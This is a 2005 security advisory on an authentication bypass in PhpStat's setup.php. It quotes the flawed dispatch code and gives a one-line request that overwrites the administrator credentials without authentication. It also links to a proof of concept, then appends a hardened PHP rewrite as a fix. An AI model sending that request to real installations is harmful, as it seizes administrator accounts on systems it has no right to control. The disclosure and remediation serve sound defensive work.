============================================================
============================================================
Title: PHP Stat Vulnerability
discovery: SoulBlack - Security Research - http://soulblack.com.ar
Date: 25/05/2005
Severity: Medium.
PHP Stat Administrative User Authentication Bypass
Affected version: unknown
vendor: http://phpstat.sourceforge.net/journal/
============================================================
============================================================

* Summary *

PhpStat is a set of PHP scripts that can analyze, sort, and generate statistics on IM log files from different clients and store the data in a database. It also allows users to read their own logs.

-------------------------------------------------------------

* Problem Description *

The bug resides in the handling of the $check variable in setup.php. The "check=yes" branch calls write(), which rewrites the stored administrator credentials, without first verifying the submitted user and password; only the "check=admin" branch performs that comparison.

Vulnerable Code

include("config.php");
include("$path_data/setup.php");

$check = $_REQUEST['check'];
$pass  = $_REQUEST['pass'];
$user  = $_REQUEST['user'];

if ($check == "admin" && $pass == $password && $user == $username) {
    showsetup();
} elseif (($check == "admin") && ($pass != $password || $user != $username)) {
    adminerror();
} elseif ($check == "yes") {
    write($_REQUEST);   /* reached with no credential check at all */
} else {
    admin();
}

/* when setup.php receives check=yes it calls the function write() */

function write($_REQUEST) {
    include("config.php");
    . . . .
    $admin    = strtolower($_REQUEST['admin']);
    $username = strtolower($_REQUEST['username']);
    $password = strtolower($_REQUEST['password']);

    $fp = fopen("$path_data/setup.php", "wb") or die ("The File \"$path_data/setup.php\" does not exist");
    flock($fp, 2);
    fputs($fp, "");   /* the written file contents are elided in the advisory */
    flock($fp, 1);
    fclose($fp);
}

So a request such as

setup.php?check=yes&username=admin&password=admin

reaches write() unauthenticated and overwrites the administrator username and password stored in setup.php.

-------------------------------------------------------------

* POC *

http://www.soulblack.com.ar/repo/tools/sbphpstatpoc.txt

-------------------------------------------------------------

* Fix *

Use .htaccess or contact Vendor.
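The following is an added example, not code from PhpStat or from the advisory author. It shows how the setup.php dispatch quoted above can be restructured so that the authentication decision is made in exactly one place and the "check=yes" branch can only be reached by a caller who also supplied the correct administrator credentials. The function names showsetup(), adminerror(), admin() and the request parameters are taken from the advisory; write_settings(), is_admin() and the sample values for $path_data, $username and $password are assumptions so the file runs stand-alone, and the file layout written to setup.php is a constructed one (the advisory elides the real contents).

```php
<?php
// Added example, not PhpStat's own code. Hardened version of the setup.php
// dispatch: every privileged branch goes through is_admin() first.

$path_data = __DIR__ . '/data';              // constructed sample value
$username  = 'admin';                        // constructed sample value (from config.php in the real app)
$password  = 'correct horse battery staple'; // constructed sample value (from setup.php in the real app)

// Original function names; bodies are placeholders for this example.
function showsetup()  { echo "setup form\n"; }
function adminerror() { http_response_code(403); echo "bad credentials\n"; }
function admin()      { echo "login form\n"; }

// Single authentication decision, so no branch can skip it.
function is_admin(array $req, string $username, string $password): bool
{
    $user = (string)($req['user'] ?? '');
    $pass = (string)($req['pass'] ?? '');
    // hash_equals() compares in constant time and always yields a bool,
    // unlike the loose == comparison in the original code.
    return hash_equals($username, $user) && hash_equals($password, $pass);
}

// Replacement for the original write(): only callable after is_admin() passed.
function write_settings(array $req, string $path_data): void
{
    $admin    = strtolower((string)($req['admin'] ?? ''));
    $new_user = strtolower((string)($req['username'] ?? ''));
    $new_pass = (string)($req['password'] ?? '');

    // Write to a temp file and rename, so a crash mid-write cannot leave a
    // truncated setup.php behind.
    $tmp = "$path_data/setup.php.tmp";
    $fp = fopen($tmp, 'wb') or die("Cannot open $tmp");
    flock($fp, LOCK_EX);
    // var_export() emits a properly quoted PHP literal, so request-controlled
    // values cannot break out of the string and inject code into setup.php.
    fputs($fp, "<?php\n"
        . '$admin = '    . var_export($admin, true)    . ";\n"
        . '$username = ' . var_export($new_user, true) . ";\n"
        . '$password = ' . var_export($new_pass, true) . ";\n");
    flock($fp, LOCK_UN);
    fclose($fp);
    rename($tmp, "$path_data/setup.php");
}

$check         = (string)($_REQUEST['check'] ?? '');
$authenticated = is_admin($_REQUEST, $username, $password);

if ($check === 'admin' && $authenticated) {
    showsetup();
} elseif ($check === 'yes' && $authenticated) {
    write_settings($_REQUEST, $path_data);
} elseif ($check === 'admin' || $check === 'yes') {
    adminerror();   // privileged action requested with missing or wrong credentials
} else {
    admin();        // unauthenticated entry point: login form only
}
```

The key change is that "check" no longer selects whether credentials are checked; it only selects which privileged action runs after the check has passed. Placing the setup script behind web-server access control (the .htaccess route suggested in the Fix section) remains worthwhile as a second layer, since it keeps unauthenticated requests from reaching the script at all.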
-------------------------------------------------------------

* References *

http://www.soulblack.com.ar/repo/papers/advisory/PhpStat_advisory.txt

-------------------------------------------------------------

* Credits *

Vulnerability reported by SoulBlack Security Research

============================================================

--
SoulBlack - Security Research
http://www.soulblack.com.ar